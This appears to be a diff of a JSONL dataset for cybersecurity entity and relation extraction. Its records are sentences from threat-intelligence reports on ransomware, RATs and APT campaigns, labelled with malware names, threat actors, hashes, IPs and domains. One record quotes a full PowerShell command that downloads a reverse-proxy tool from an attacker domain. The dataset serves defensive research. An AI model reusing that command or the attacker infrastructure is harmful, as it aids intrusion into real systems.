process.StartInfo.Arguments = string.Format(\"PIPE Google \\\"{0}\\\"\", text); process.StartInfo.FileName = Process.GetCurrentProcess().MainModule.FileName; process.Start();","entities":[],"relations":[],"Comments":[]} +{"id":2011,"text":"The ransom note also instructs victims to download Tox and provides a Tox Chat ID to reach the threat actor.","entities":[],"relations":[],"Comments":[]} +{"id":14219,"text":"Figure 1: Extra section .idata added to the original loadperf.dll Figure 2: Extra imported function gzwrite64","entities":[{"id":48248,"label":"SOFTWARE","start_offset":101,"end_offset":110}],"relations":[],"Comments":[]} +{"id":13948,"text":"SunCrypt, RagnarLocker, and Avaddon were among the first groups documented doing this.","entities":[{"id":48764,"label":"threat-actor","start_offset":10,"end_offset":22},{"id":48765,"label":"threat-actor","start_offset":0,"end_offset":8},{"id":48766,"label":"threat-actor","start_offset":28,"end_offset":36}],"relations":[],"Comments":[]} +{"id":401,"text":" As further information emerges or additional detections and protections are put into place, Palo Alto Networks will update this publication accordingly.","entities":[{"id":46102,"label":"identity","start_offset":93,"end_offset":111}],"relations":[],"Comments":[]} +{"id":4994,"text":"Related IOCs","entities":[],"relations":[],"Comments":[]} +{"id":10316,"text":"IMAP RAT Trojan.MSIL.OCEANMAP.A Troj.Win32.TRX.XXPE50FFF039 31577308ac62fd29d3159118d1f552b28a56a9c039fef1d3337c9700a3773cbf","entities":[{"id":31459,"label":"SHA1","start_offset":63,"end_offset":127}],"relations":[],"Comments":[]} +{"id":4060,"text":"ChiserClient is installed as a system service to allow the threat actors access to higher privileges and keep persistence on the compromised host.","entities":[{"id":49900,"label":"malware","start_offset":0,"end_offset":12}],"relations":[],"Comments":[]} +{"id":1180,"text":"We\u2019ll leave that determination to the reader.","entities":[],"relations":[],"Comments":[]} +{"id":4372,"text":" Tags APT & Targeted Attacks | Cyber Crime | Research | Articles, News, Reports","entities":[],"relations":[],"Comments":[]} +{"id":8322,"text":"Accept-Encoding: gzip Connection: Keep-Alive","entities":[],"relations":[],"Comments":[]} +{"id":2778,"text":" The focus of these attacks is to use the victim\u2019s web browser to access the computational resources of their system.","entities":[],"relations":[],"Comments":[]} +{"id":13056,"text":"In this blog, Trend Micro researchers walk through a recent investigation that involved trojanized open-source software, which is tricky to spot because it takes on the fa\u00e7ade of legitimate, non-malicious software, making it especially stealthy and useful for targeted attacks.","entities":[],"relations":[],"Comments":[]} +{"id":4245,"text":"We initially spotted some visual similarities between the malware used.","entities":[],"relations":[],"Comments":[]} +{"id":3766,"text":" Attackers can, therefore, leverage CVE-2022-22954 to remotely execute commands to overwrite specific paths.","entities":[{"id":49598,"label":"attack-pattern","start_offset":83,"end_offset":107},{"id":49596,"label":"vulnerability","start_offset":36,"end_offset":50},{"id":49597,"label":"attack-pattern","start_offset":54,"end_offset":79}],"relations":[{"id":842,"from_id":49596,"to_id":49597,"type":"uses"},{"id":843,"from_id":49596,"to_id":49598,"type":"uses"}],"Comments":[]} +{"id":3613,"text":"07be156caac1157707ffe38266dc60abadc488226b4f41d67f23eac98dd917b0","entities":[{"id":10903,"label":"SHA2","start_offset":0,"end_offset":64}],"relations":[],"Comments":[]} +{"id":456,"text":" What is it?","entities":[],"relations":[],"Comments":[]} +{"id":13093,"text":"As connectivity is introduced to industrial computing devices, the challenge is managing the threat from remote attackers.","entities":[],"relations":[],"Comments":[]} +{"id":1017,"text":"Another seller offered to provide real identity information for a stolen account so the buyer could change the corresponding password and security questions.","entities":[],"relations":[],"Comments":[]} +{"id":56,"text":"In the last two years, but particularly in the last six months, the price of bitcoin and other cryptocurrencies experienced a massive price surge with respect to the U.S. dollar and other fiat currencies.","entities":[],"relations":[],"Comments":[]} +{"id":8307,"text":"HYPERSCRAPE demonstrates Charming Kitten\u2019s commitment to developing and maintaining purpose-built capabilities.","entities":[{"id":25616,"label":"threat-actor","start_offset":25,"end_offset":40},{"id":25617,"label":"location","start_offset":68,"end_offset":71}],"relations":[],"Comments":[]} +{"id":3275,"text":"BIOPASS RAT commands OpenEverything The malware downloads \u201cEverything\u201d files if the \u201cEverything\u201d binary is not found in the \u201c%TEMP%\u201d folder.","entities":[{"id":48373,"label":"FILEPATH","start_offset":128,"end_offset":134},{"id":9976,"label":"malware","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} +{"id":12814,"text":"Additionally, the IP 211[.]72 [.]242[.]120 is one of the hosts for the domain microsoftmse[.]com, which has been used by several KIVARS variants.","entities":[{"id":39901,"label":"location","start_offset":46,"end_offset":49},{"id":39902,"label":"malware","start_offset":129,"end_offset":135}],"relations":[],"Comments":[]} +{"id":6371,"text":" Once the SSL handshake to IP 174.129.157[.]251 is complete, the following data is sent via HTTP POST to the Brute Ratel C4 listener port.","entities":[{"id":19759,"label":"location","start_offset":10,"end_offset":13},{"id":19760,"label":"IPV4","start_offset":30,"end_offset":47},{"id":19761,"label":"location","start_offset":97,"end_offset":101}],"relations":[],"Comments":[]} +{"id":2945,"text":" Looking at this latest operation on the continuum of evolving cryptocurrency-focused threats, it\u2019s clear that this is an early-stage threat given its lack of sophistication and reuse of established techniques and tactics.","entities":[],"relations":[],"Comments":[]} +{"id":1382,"text":"AdvancedRun.exe is used to execute PowerShell.exe to delete and stop Windows Defender.","entities":[{"id":46721,"label":"FILEPATH","start_offset":0,"end_offset":15},{"id":46722,"label":"FILEPATH","start_offset":35,"end_offset":49},{"id":46723,"label":"SOFTWARE","start_offset":69,"end_offset":85}],"relations":[],"Comments":[]} +{"id":4659,"text":"A new folder named \"Download\" is created adjacent to the main binary.","entities":[],"relations":[],"Comments":[]} +{"id":1380,"text":"A Visual Basic Script (VBS) is created in C:\\Users\\[USERNAME]\\AppData\\Local\\Temp named: Nmddfrqqrbyjeygggda.vbs 4. Process wscript.exe is used to execute the VBS script in step 3.","entities":[{"id":44985,"label":"FILEPATH","start_offset":88,"end_offset":111},{"id":44986,"label":"FILEPATH","start_offset":124,"end_offset":135},{"id":44984,"label":"FILEPATH","start_offset":42,"end_offset":80}],"relations":[],"Comments":[]} +{"id":13986,"text":"While the endpoint is still critical, there are vast numbers of malicious artifacts that are siloed or missed at the network, cloud, and gateway.","entities":[],"relations":[],"Comments":[]} +{"id":8635,"text":"The links led to attacker-controlled domains that mimicked legitimate websites related to the targeted users.","entities":[],"relations":[],"Comments":[]} +{"id":4151,"text":"This is used to download reverse proxy Chisel via PowerShell: c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe -command \"$(new-object System.Net.WebClient).DownloadFile('https[:]\/\/webadmin[.]mirrorstorage[.]org\/ch.exe', 'ch.exe')\"","entities":[{"id":12475,"label":"malware","start_offset":39,"end_offset":45},{"id":12476,"label":"tools","start_offset":50,"end_offset":60},{"id":49959,"label":"FILEPATH","start_offset":62,"end_offset":119},{"id":49960,"label":"URL","start_offset":179,"end_offset":226},{"id":49961,"label":"FILEPATH","start_offset":230,"end_offset":236}],"relations":[],"Comments":[]} {"id":325,"text":" F-Secure was the first to spot this new version on October 1, but since then the attacks have ramped up and new variants of the malware are emerging daily.","entities":[{"id":46017,"label":"TIME","start_offset":52,"end_offset":61},{"id":46016,"label":"identity","start_offset":1,"end_offset":9}],"relations":[],"Comments":[]} -{"id":326,"text":"Our WildFire analysis platform has picked up 84 CryptoWall 2.0 variants since September 30, delivered primarily through e-mail attachments but also through malicious PDFs and web exploit kits.","entities":[{"id":1120,"label":"tools","start_offset":4,"end_offset":12},{"id":46018,"label":"malware","start_offset":48,"end_offset":62},{"id":46019,"label":"TIME","start_offset":78,"end_offset":90}],"relations":[],"Comments":[]} -{"id":327,"text":" CryptoWall 2.0 is similar to other ransomware attacks that have plagued users and businesses for nearly a decade.","entities":[{"id":44701,"label":"malware","start_offset":1,"end_offset":15}],"relations":[],"Comments":[]} -{"id":328,"text":"Once it is running on a system, CryptoWall 2.0 seeks out document files and encrypts them using the RSA encryption algorithm.","entities":[{"id":46020,"label":"malware","start_offset":32,"end_offset":46}],"relations":[],"Comments":[]} -{"id":329,"text":"The attacker holds the key necessary to decrypt the files unless the victim agrees to pay a $500 ransom. Unlike previous versions of CryptoWall, 2.0 communicates with its command and control (C2) server through the Tor anonymization network.","entities":[{"id":46021,"label":"malware","start_offset":134,"end_offset":149},{"id":46022,"label":"tools","start_offset":216,"end_offset":219},{"id":46023,"label":"Infrastucture","start_offset":172,"end_offset":203}],"relations":[{"id":145,"from_id":46021,"to_id":46022,"type":"uses"},{"id":144,"from_id":46021,"to_id":46023,"type":"beacons-to"}],"Comments":[]} -{"id":330,"text":"This allows attackers to hide their communications and avoid having their C2 servers shut down, but also makes it easy for organizations to block the threat.","entities":[],"relations":[],"Comments":[]} -{"id":331,"text":"CryptoWall isn’t the only threat that communicates over Tor and if your network doesn’t have an explicit reason to allow anonymization networks, you should consider blocking the application altogether with your firewall.","entities":[{"id":1138,"label":"malware","start_offset":0,"end_offset":10},{"id":1140,"label":"tools","start_offset":56,"end_offset":59}],"relations":[{"id":147,"from_id":1138,"to_id":1140,"type":"uses"}],"Comments":[]} -{"id":332,"text":" If your system has already been infected with CryptoWall 2.0, you’ll see a pop-up just like this one shortly after the malware has encrypted your documents.","entities":[{"id":46024,"label":"malware","start_offset":47,"end_offset":61}],"relations":[],"Comments":[]} -{"id":333,"text":"Note that the attacker has given you a few options for how to pay them the ransom.","entities":[],"relations":[],"Comments":[]} -{"id":334,"text":"The green box contains four links that will work only for your system.","entities":[],"relations":[],"Comments":[]} -{"id":335,"text":"These use four domains registered just today:","entities":[],"relations":[],"Comments":[]} -{"id":336,"text":" All of the domains currently resolve to 151.248.115.146, a Russian IP address and have WhoIs records associated with the e-mail address “ladomfichisi1987@mail.ru”.","entities":[{"id":1156,"label":"IPV4","start_offset":41,"end_offset":56},{"id":46025,"label":"location","start_offset":60,"end_offset":67},{"id":44703,"label":"EMAIL","start_offset":138,"end_offset":162}],"relations":[{"id":148,"from_id":1156,"to_id":44703,"type":"related-to"}],"Comments":[]} -{"id":337,"text":"This is the same address used to register two other payment domains registered earlier this month:","entities":[],"relations":[],"Comments":[]} -{"id":338,"text":"If these domains are confiscated or otherwise shut down, CryptoWall instructs the user to download the Tor Browser and access a website (paytordmbdekmizq.onion) that is only accessible over the Tor network. Unlikely some of it’s more flexible competition, CryptoWall only accepts ransom in the form of BitCoin.","entities":[{"id":46026,"label":"malware","start_offset":57,"end_offset":67},{"id":46027,"label":"tools","start_offset":103,"end_offset":114},{"id":46028,"label":"DOMAIN","start_offset":137,"end_offset":159},{"id":46029,"label":"SOFTWARE","start_offset":194,"end_offset":205},{"id":46031,"label":"SOFTWARE","start_offset":303,"end_offset":310},{"id":46030,"label":"malware","start_offset":257,"end_offset":267}],"relations":[{"id":149,"from_id":46026,"to_id":46027,"type":"related-to"},{"id":150,"from_id":46026,"to_id":46028,"type":"related-to"}],"Comments":[]} -{"id":339,"text":"To pay the ransom the user will need to acquire 1.33 BitCoins and transfer them to a specific BitCoin wallet that is associated with their specific infection.","entities":[{"id":44704,"label":"SOFTWARE","start_offset":53,"end_offset":61},{"id":44705,"label":"SOFTWARE","start_offset":94,"end_offset":101}],"relations":[],"Comments":[]} -{"id":340,"text":" History has shown that paying the ransom will likely allow you to retrieve your files, but the best defense against ransomware is having up-to-date back-ups or by preventing the infection all-together.","entities":[],"relations":[],"Comments":[]} -{"id":341,"text":" Since we detected the first CryptoWall 2.0 variant with our WildFire engine on September 29, we’ve seen over 85,000 separate attacks attempting to deliver the malware.","entities":[{"id":1185,"label":"malware","start_offset":61,"end_offset":69},{"id":46032,"label":"TIME","start_offset":80,"end_offset":92},{"id":46033,"label":"malware","start_offset":29,"end_offset":43}],"relations":[],"Comments":[]} +{"id":3453,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} +{"id":62,"text":"In contrast to bitcoin, Monero was designed to enable private transactions using a closed ledger, and its mining algorithm is still mined effectively by both PC CPUs and GPUs.","entities":[{"id":45820,"label":"SOFTWARE","start_offset":24,"end_offset":30}],"relations":[],"Comments":[]} +{"id":12030,"text":"Some commodity malware used included RedLine, Vidar, Predator The Thief, Nexus stealer, Azorult, Raccoon, Grand Stealer, Vikro Stealer, Masad (Google\u2019s naming), and Kantal (Google\u2019s naming) which shares code similarity with Vidar.","entities":[{"id":37224,"label":"malware","start_offset":79,"end_offset":86},{"id":37231,"label":"location","start_offset":161,"end_offset":164}],"relations":[],"Comments":[]} +{"id":4852,"text":"TAG has linked former employees of both Appin and Belltrox to Rebsec, a new firm that openly advertises corporate espionage as an offering on its company website.","entities":[{"id":50828,"label":"identity","start_offset":0,"end_offset":3},{"id":50829,"label":"identity","start_offset":40,"end_offset":45},{"id":50831,"label":"identity","start_offset":62,"end_offset":68},{"id":50830,"label":"identity","start_offset":50,"end_offset":58}],"relations":[],"Comments":[]} +{"id":13518,"text":"Encrypt the drives of all computers and other machines that are used to store sensitive information.","entities":[],"relations":[],"Comments":[]} +{"id":4850,"text":"One cluster of this activity frequently targets government, healthcare, and telecom sectors in Saudi Arabia, the United Arab Emirates, and Bahrain with credential phishing campaigns.","entities":[{"id":50820,"label":"location","start_offset":95,"end_offset":107},{"id":50821,"label":"location","start_offset":113,"end_offset":133},{"id":50822,"label":"location","start_offset":139,"end_offset":146},{"id":50823,"label":"campaign","start_offset":152,"end_offset":181}],"relations":[{"id":1025,"from_id":50823,"to_id":50822,"type":"targets"},{"id":1026,"from_id":50823,"to_id":50820,"type":"targets"},{"id":1027,"from_id":50823,"to_id":50821,"type":"targets"}],"Comments":[]} +{"id":5143,"text":"You would never think of going, \"Okay.","entities":[],"relations":[],"Comments":[]} +{"id":10018,"text":"\u2014 TSPY_KORPLUG.AN 52374f68d1e43f1ca6cd04e5816999ba45c4e42eb0641874be25808c9fe15005 (rcview.log)","entities":[{"id":30592,"label":"SHA2","start_offset":18,"end_offset":82}],"relations":[],"Comments":[]} +{"id":10094,"text":"It can also execute web shell commands via a specific HTTP request format.","entities":[{"id":30785,"label":"location","start_offset":3,"end_offset":6},{"id":30786,"label":"attack-pattern","start_offset":20,"end_offset":29}],"relations":[],"Comments":[]} +{"id":13163,"text":"For one thing, the USBferry malware already has at least three versions, with different variants and components, at the time of writing.","entities":[{"id":41076,"label":"tools","start_offset":19,"end_offset":27},{"id":41078,"label":"location","start_offset":97,"end_offset":100},{"id":41079,"label":"location","start_offset":120,"end_offset":124}],"relations":[],"Comments":[]} +{"id":1333,"text":"Initially, the malware will set the following registry key: Where [current_executable_filename] is the path to the current running executable, which is acquired via a call to GetModuleFileNameA.","entities":[],"relations":[],"Comments":[]} +{"id":14076,"text":"GNUBoard compromised web sites","entities":[{"id":48007,"label":"SOFTWARE","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} +{"id":1652,"text":" Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} +{"id":12688,"text":"While analyzing Glupteba binaries, our team identified a few containing a git repository URL: \u201cgit.voltronwork.com\u201d.","entities":[{"id":39373,"label":"malware","start_offset":16,"end_offset":24}],"relations":[],"Comments":[]} +{"id":504,"text":"In the current threat landscape, ransom payments are rising and organizations are seeking to protect themselves from threat actors.","entities":[],"relations":[],"Comments":[]} +{"id":4047,"text":"Stage 2: Backdoors","entities":[],"relations":[],"Comments":[]} +{"id":10808,"text":"Malicious code initialization","entities":[],"relations":[],"Comments":[]} +{"id":2830,"text":"However, it was easily subverted to work against the malware.","entities":[],"relations":[],"Comments":[]} +{"id":1620,"text":" Constants.java After determining the phone is on one of the correct networks, the malware searches for the phone\u2019s mobile number.","entities":[{"id":45079,"label":"FILEPATH","start_offset":1,"end_offset":15}],"relations":[],"Comments":[]} +{"id":14054,"text":"Figure 7 shows delivery PowerShell script sections for both campaigns.","entities":[{"id":43521,"label":"tools","start_offset":24,"end_offset":34}],"relations":[],"Comments":[]} +{"id":2298,"text":"In late August 2021, TAG discovered watering hole attacks targeting visitors to Hong Kong websites for a media outlet and a prominent pro-democracy labor and political group.","entities":[{"id":45449,"label":"TIME","start_offset":8,"end_offset":19},{"id":45451,"label":"attack-pattern","start_offset":36,"end_offset":49},{"id":45453,"label":"identity","start_offset":134,"end_offset":173},{"id":45452,"label":"location","start_offset":80,"end_offset":90},{"id":45450,"label":"identity","start_offset":21,"end_offset":24}],"relations":[{"id":97,"from_id":45453,"to_id":45451,"type":"targets"},{"id":96,"from_id":45451,"to_id":45452,"type":"targets"}],"Comments":[]} +{"id":3614,"text":"CustomIncreaseX Backdoor.MSIL.BLADABINDI.QBR b00cc9a4292fc5cc4ae5371ea1615ec6e49ebaf061dc4eccde84a6f96d95747c NotePadEx Backdoor.MSIL.BLADABINDI.QBR 6755ce7a362ffecef805e4c54e1d5e201b6c6d561b997ebbd63a8d814ce6a53f QuickTranslation Backdoor.MSIL.BLADABINDI.QBR 8ff11efc1109073fdc49be93e1d100992314fd68ecdff2ba986107602ce75089 SandwichGenerator Backdoor.MSIL.BLADABINDI.QBR 02f2369b58fbb2ba1df2c799b73842880a4874c32c1514a0d8956133be026ade SimpleGame Backdoor.Win32.REMCOS.USMANEAGDZ","entities":[{"id":10904,"label":"SHA2","start_offset":45,"end_offset":109},{"id":10905,"label":"SHA2","start_offset":149,"end_offset":213},{"id":10907,"label":"SHA2","start_offset":372,"end_offset":436},{"id":10906,"label":"SHA2","start_offset":260,"end_offset":324},{"id":49394,"label":"malware","start_offset":16,"end_offset":44},{"id":49395,"label":"malware","start_offset":120,"end_offset":148},{"id":49396,"label":"malware","start_offset":231,"end_offset":259},{"id":49398,"label":"malware","start_offset":448,"end_offset":480},{"id":49397,"label":"malware","start_offset":343,"end_offset":371}],"relations":[],"Comments":[]} +{"id":1894,"text":"Some of these C&C websites also act as phishing sites that lure users into downloading these very applications.","entities":[{"id":47026,"label":"attack-pattern","start_offset":39,"end_offset":47}],"relations":[],"Comments":[]} +{"id":4698,"text":"It was last updated on July 29, 2022.","entities":[{"id":50582,"label":"TIME","start_offset":23,"end_offset":36}],"relations":[],"Comments":[]} +{"id":2390,"text":"In the same vein, we have observed that LavagokLdr\u2019s payload, Crosswalk, and one of StealthVector\u2019s payloads, ScrambleCross, perform similar techniques for decryption and signature checking.","entities":[{"id":47455,"label":"malware","start_offset":40,"end_offset":50},{"id":47456,"label":"malware","start_offset":62,"end_offset":71},{"id":47458,"label":"malware","start_offset":110,"end_offset":123},{"id":47457,"label":"malware","start_offset":84,"end_offset":98}],"relations":[],"Comments":[]} +{"id":10347,"text":" Figure 4.","entities":[],"relations":[],"Comments":[]} +{"id":4405,"text":"After parsing, the cookies are inserted into a local cache used by the embedded web browser.","entities":[],"relations":[],"Comments":[]} +{"id":13005,"text":"The targets, primarily located in Lithuania, were sent links to attacker controlled domains from a domain spoofing the Facebook security team.","entities":[{"id":48804,"label":"location","start_offset":34,"end_offset":43},{"id":48805,"label":"SOFTWARE","start_offset":119,"end_offset":128}],"relations":[],"Comments":[]} +{"id":14406,"text":"After obtaining more powerful user accounts, the attacker can laterally move to other systems and use \u201cnormal\u201d tools to perform other activities.","entities":[],"relations":[],"Comments":[]} +{"id":13551,"text":"The script connects to the Water Pamola\u2019s server and downloads additional payloads.","entities":[{"id":51627,"label":"malware","start_offset":4,"end_offset":10},{"id":51626,"label":"Infrastucture","start_offset":27,"end_offset":48}],"relations":[{"id":1117,"from_id":51627,"to_id":51626,"type":"beacons-to"}],"Comments":[]} +{"id":2674,"text":"The graph below demonstrates that at the end of FY 2021, threat actors using LockBit 2.0 were much more open to negotiations of ransom amounts; during that time the ransom was dropped approximately 83% from the initial ask on average.","entities":[{"id":47875,"label":"TIME","start_offset":48,"end_offset":55},{"id":47876,"label":"threat-actor","start_offset":77,"end_offset":88}],"relations":[],"Comments":[]} +{"id":5345,"text":"This is because the core component can receive new parameters from the C&C servers.","entities":[],"relations":[],"Comments":[]} +{"id":7046,"text":"It encodes it using another key and writes it to the registry key \u201cSoftware\\Classes\\scConfig\u201d (HKEY_LOCAL_MACHINE or HKEY_CURRENT_USER hive, depending on the privileges of the process).","entities":[{"id":22093,"label":"location","start_offset":32,"end_offset":35},{"id":22094,"label":"malware","start_offset":135,"end_offset":139}],"relations":[],"Comments":[]} +{"id":2354,"text":"Beer was able to quickly recognize this exploit as a variant of an earlier port type confusion vulnerability he analyzed in the XNU kernel (CVE-2020-27932).","entities":[{"id":47411,"label":"SOFTWARE","start_offset":128,"end_offset":138},{"id":47412,"label":"vulnerability","start_offset":140,"end_offset":154}],"relations":[{"id":318,"from_id":47412,"to_id":47411,"type":"has"}],"Comments":[]} +{"id":14000,"text":"Because of this, finding code similarity is unlikely.","entities":[],"relations":[],"Comments":[]} +{"id":3445,"text":" We observed this signature triggered 2,552 times between 4:47 and 14:00 UTC on May 10.","entities":[{"id":49219,"label":"TIME","start_offset":50,"end_offset":86}],"relations":[],"Comments":[]} +{"id":7687,"text":"A sample of an .ISO file with an embedded .LNK file The pm2 file contains and runs another executable, which is an installer file created using Nullsoft Scriptable Install System (NSIS), a free script-driven installer authoring tool for Windows.","entities":[{"id":23913,"label":"location","start_offset":2,"end_offset":8},{"id":23914,"label":"location","start_offset":74,"end_offset":77},{"id":23915,"label":"malware","start_offset":180,"end_offset":184},{"id":23916,"label":"location","start_offset":228,"end_offset":232}],"relations":[],"Comments":[]} +{"id":10565,"text":"Following our November update, today we\u2019re sharing the latest insights to fight phishing, and for security teams, providing more details about our work identifying attacks against zero-day vulnerabilities.","entities":[{"id":32227,"label":"attack-pattern","start_offset":80,"end_offset":88},{"id":32228,"label":"location","start_offset":90,"end_offset":93},{"id":32229,"label":"location","start_offset":98,"end_offset":106}],"relations":[],"Comments":[]} +{"id":4033,"text":"After exploiting the victim's environments successfully, the threat actors start Active Directory (AD) discovery and spread their tools via Server Message Block (SMB).","entities":[],"relations":[],"Comments":[]} +{"id":12017,"text":"Once the target agreed to the deal, a malware landing page disguised as a software download URL was sent via email or a PDF on Google Drive, and in a few cases, Google documents containing the phishing links.","entities":[{"id":37172,"label":"location","start_offset":9,"end_offset":15},{"id":37173,"label":"location","start_offset":30,"end_offset":34},{"id":37174,"label":"location","start_offset":46,"end_offset":53},{"id":37175,"label":"location","start_offset":54,"end_offset":58},{"id":37177,"label":"location","start_offset":141,"end_offset":144},{"id":37179,"label":"attack-pattern","start_offset":193,"end_offset":201}],"relations":[],"Comments":[]} +{"id":633,"text":" When this process completes, the malware displays an ASCII Ransom note demanding payment from the victim (Figure 1). Figure 1: Latest Petya Ransom note displayed on a compromised system.","entities":[{"id":2109,"label":"malware","start_offset":136,"end_offset":141}],"relations":[],"Comments":[]} +{"id":12973,"text":"We would also like to thank Project Zero for their technical assistance in helping analyze these bugs.","entities":[],"relations":[],"Comments":[]} +{"id":3308,"text":"The script to decrypt Chrome\u2019s file with AES or DPAPI decryption If the value of the \u201ctype\u201d argument is \u201cFile\u201d","entities":[{"id":48389,"label":"SOFTWARE","start_offset":22,"end_offset":30}],"relations":[],"Comments":[]} +{"id":2189,"text":"They created a true Trojan horse, which sneaks into a network as a gift, but when opened, the attacker\u2019s army leaps out.","entities":[],"relations":[],"Comments":[]} +{"id":3510,"text":"ServiceManage - Lists all of the services in the compromised host.","entities":[],"relations":[],"Comments":[]} +{"id":12409,"text":"We encourage anyone who discovers a Chrome vulnerability to report that activity through the Chrome Vulnerabilities Rewards Program submission process.","entities":[],"relations":[],"Comments":[]} +{"id":4789,"text":"We welcome recent steps taken by the government in applying sanctions to the NSO Group and Candiru, and we believe other governments should consider expanding these restrictions.","entities":[{"id":50689,"label":"threat-actor","start_offset":77,"end_offset":86},{"id":50690,"label":"threat-actor","start_offset":91,"end_offset":98}],"relations":[],"Comments":[]} +{"id":7125,"text":"We found the FRP tool being used on a Linux host, which is similar to Avast\u2019s findings in a report that they published on the Iron Tiger threat actor.","entities":[{"id":22285,"label":"tools","start_offset":13,"end_offset":16},{"id":22286,"label":"location","start_offset":17,"end_offset":21},{"id":22287,"label":"location","start_offset":44,"end_offset":48},{"id":22288,"label":"identity","start_offset":70,"end_offset":75},{"id":22289,"label":"threat-actor","start_offset":126,"end_offset":136}],"relations":[],"Comments":[]} +{"id":13755,"text":"The decryption algorithm is RC4, which takes the hardcoded path to form the decryption key.","entities":[],"relations":[],"Comments":[]} +{"id":443,"text":" The real, significant situation shoppers and retailers need to think about this season is when unauthorized coin mining code is on a site without that site owner\u2019s knowledge and permission.","entities":[{"id":46123,"label":"attack-pattern","start_offset":96,"end_offset":120}],"relations":[],"Comments":[]} +{"id":1129,"text":"The initial classifications to be used are \u201cbenign\u201d, \u201cmalware\u201d, or \u201cstatistical\u201d.","entities":[],"relations":[],"Comments":[]} +{"id":2252,"text":"In the event it is new, it will proceed to execute the various reconnaissance commands found on line #2.","entities":[],"relations":[],"Comments":[]} +{"id":4884,"text":"The actors behind this campaign, which we attribute to a group of hackers recruited in a Russian-speaking forum, lure their target with fake collaboration opportunities (typically a demo for anti-virus software, VPN, music players, photo editing or online games), hijack their channel, then either sell it to the highest bidder or use it to broadcast cryptocurrency scams.","entities":[],"relations":[],"Comments":[]} +{"id":3648,"text":"And prevention here is really focused on two things.","entities":[],"relations":[],"Comments":[]} +{"id":4997,"text":"The commit was not flagged as a security issue and therefore the patch was not backported in most Android kernels.","entities":[],"relations":[],"Comments":[]} +{"id":702,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} +{"id":1374,"text":"Discord\u2019s CDN is a user-created service that allows users to host attachments and is not malicious.","entities":[{"id":46708,"label":"SOFTWARE","start_offset":0,"end_offset":7}],"relations":[],"Comments":[]} +{"id":218,"text":"Over the past 24 hours, the list of entities on the leaks section has expanded to 48 gov.ua domains and one Ukranian company (motorsich[.]com) that builds engines for airplanes and helicopters.","entities":[{"id":45912,"label":"TIME","start_offset":5,"end_offset":22},{"id":45913,"label":"identity","start_offset":108,"end_offset":124},{"id":45914,"label":"DOMAIN","start_offset":126,"end_offset":141}],"relations":[],"Comments":[]} +{"id":3727,"text":"Solutions such as Trend Micro Vision One\u2122\ufe0f provide visibility, correlated detection, and behavior monitoring across multiple layers: email, endpoints, servers, cloud workloads.","entities":[{"id":49527,"label":"SOFTWARE","start_offset":18,"end_offset":40}],"relations":[],"Comments":[]} +{"id":11042,"text":"We terminated 12 YouTube channels as part of our ongoing investigation into coordinated influence operations linked to Russia.","entities":[],"relations":[],"Comments":[]} +{"id":12673,"text":"Indicators of Compromise SHA-256 hash Detection Name 08677a3dac3609d13dc4a2a6868ee2f6c1334f4579356d162b706a03839bb9ff Ransom.PS1.COLDLOCK.YPAE-A c5108344e8a6da617af1c4a7fd8924a64130b4c86fa0f6d6225bb75534a80a35 Ransom.MSIL.COLDLOCK.YPAE-A All Trend Micro products using the latest VSAPI pattern (15.849.00 or later) are capable of successful detection of this malware.","entities":[{"id":39321,"label":"SHA2","start_offset":54,"end_offset":118},{"id":39322,"label":"location","start_offset":119,"end_offset":125},{"id":39323,"label":"SHA2","start_offset":146,"end_offset":210},{"id":39324,"label":"location","start_offset":211,"end_offset":217},{"id":39325,"label":"location","start_offset":251,"end_offset":256},{"id":39326,"label":"location","start_offset":318,"end_offset":321}],"relations":[],"Comments":[]} +{"id":7142,"text":"Multiple infection vectors have been attributed to this threat actor in the past: Watering holes","entities":[],"relations":[],"Comments":[]} +{"id":1073,"text":"Additionally, our researchers have outlined how it\u2019s possible to create a Toast window that overlays the entire screen, so it\u2019s possible to use Toast to create the functional equivalent of regular app windows.","entities":[],"relations":[],"Comments":[]} +{"id":11308,"text":"We have seen it deployed against fewer than two dozen accounts located in Iran.","entities":[],"relations":[],"Comments":[]} +{"id":2061,"text":", we were able to observe another GitHub account with the name l4ckyguy, sharing the profile picture, location and URL in the description, with a link to the previously observed account (x4kme), and a name, Ivan Topor, which we believe may be another alias for this threat actor.","entities":[{"id":45241,"label":"SOFTWARE","start_offset":34,"end_offset":40},{"id":45242,"label":"identity","start_offset":63,"end_offset":71},{"id":45243,"label":"threat-actor","start_offset":187,"end_offset":192},{"id":45244,"label":"identity","start_offset":207,"end_offset":218},{"id":6137,"label":"location","start_offset":111,"end_offset":114},{"id":6138,"label":"location","start_offset":195,"end_offset":198},{"id":6140,"label":"location","start_offset":236,"end_offset":239}],"relations":[{"id":93,"from_id":45243,"to_id":45244,"type":"related-to"},{"id":92,"from_id":45243,"to_id":45242,"type":"related-to"}],"Comments":[]} +{"id":3883,"text":"Indicators of Compromise Hash Downloader used in the campaign: 76b1f75ee15273d1226392db3d8f1b2aed467c2875e11d9c14fd18120afc223a 4edcff56f586bd69585e0c9d1d7ff4bfb1a2dac6e2a9588f155015ececbe1275 1b5a1751960b2c08631601b07e3294e4c84dfd71896453b65a45e4396a6377cc Hashes detected as part of the BKDR_ANEL Family: 5.0.0 beta1 af1b2cd8580650d826f48ad824deef3749a7db6fde1c7e1dc115c6b0a7dfa0dd 5.1.1 rc 2371f5b63b1e44ca52ce8140840f3a8b01b7e3002f0a7f0d61aecf539566e6a1 5.1.2 rc1 05dd407018bd316090adaea0855bd7f7c72d9ce4380dd4bc0feadc6566a36170 5.2.0 rev1 00030ec8cce1f21120ebf5b90ec408b59166bbc3fba17ebae0fc23b3ca27bf4f lena_http.bin 303f9c00edb4c6082542e456a30a2446a259b8bb9fb6b0f76ff318d5905e429c Tools used in the campaign: Getpass.exe 52a8557c8cdd5d925453383934cb10a85b117522b95c6d28ca097632ac8bc10d event.dll 6c3224dbf6bbabe058b0ab46233c9d35c970aa83e8c4bdffb85d78e31159d489 mail.exe 2f76c9242d5ad2b1f941fb47c94c80c1ce647df4d2d37ca2351864286b0bb3d8 URLs and IP Addresses related to the campaign: www[.]nasnnones[.]com trems[.]rvenee[.]com 